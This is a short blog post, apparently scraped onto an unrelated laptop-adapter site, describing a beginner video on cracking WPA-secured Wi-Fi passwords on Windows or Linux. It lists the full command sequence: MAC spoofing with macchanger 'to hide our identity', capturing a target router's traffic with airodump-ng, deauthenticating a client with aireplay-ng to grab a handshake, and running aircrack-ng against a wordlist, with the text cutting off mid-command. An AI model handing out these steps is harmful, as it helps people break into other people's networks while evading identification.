How To Hack Wireless Networks (WPA - Windows/Linux) - Part 2

Thursday, December 20, 2012

How To Hack Wireless Networks (WPA - Windows/Linux) - Part 2 Video Clips. Duration : 6.85 Mins.


This is very easy(Noob-Friendly) yet detailed tutorial on how to hack WPA-Secured wireless network passwords. This video shows how to do it on a Windows OS(XP, Vista, 7) or a Linux OS. There are two reasons why I used a virtual OS rather then running the cracking tool locally in a Windows environment; 1 - I want this tutorial to assist not only Windows-Users but also Linux-Users and 2 - Compatibility issues are very common with airmon-ng when using in the Windows Environment and will not only limit the amount of people who are able to do it but also complicate the procedure for beginners. - Commands Used: airmon-ng (Shows connected network adapters/devices) macchanger -s [INTERFACE] (Shows our current Mac Address) macchanger -m [DESIRED MAC] [INTERACE] (Spoofs our Mac Address to hide our identity) airodump-ng [INTERFACE] (Shows available networks on your network adapter) airodump-ng --bssid [Mac of Router] -w [FILENAME] -c [CHANNEL] [ADAPTER] (Writes intercepted/sniffed IV's to a CAP document. The bssid specifies the Mac Address of the Access Point you are wanting to crack so the Mac Address should differ from what I use. The Channel may also differ depending on what's displayed for you. Same goes for the network adapter. This will only be useful if a Handshake is done) aireplay-ng -0 15 -a [MAC OF ROUTER] -c [MAC OF SYSTEM ON NETWORK] [ADAPTER] (Deauthenticates client and obtains a handshake) aircrack-ng -e [ESSID - Name of network] -w [WORDLIST] [FILENAME.cap ...

0 comments:

Post a Comment

Copyright © 2012 Laptop Adapters

CERTAIN CONTENT THAT APPEARS ON THIS SITE COMES FROM AMAZON SERVICES LLC. THIS CONTENT IS PROVIDED �AS IS� AND IS SUBJECT TO CHANGE OR REMOVAL AT ANY TIME.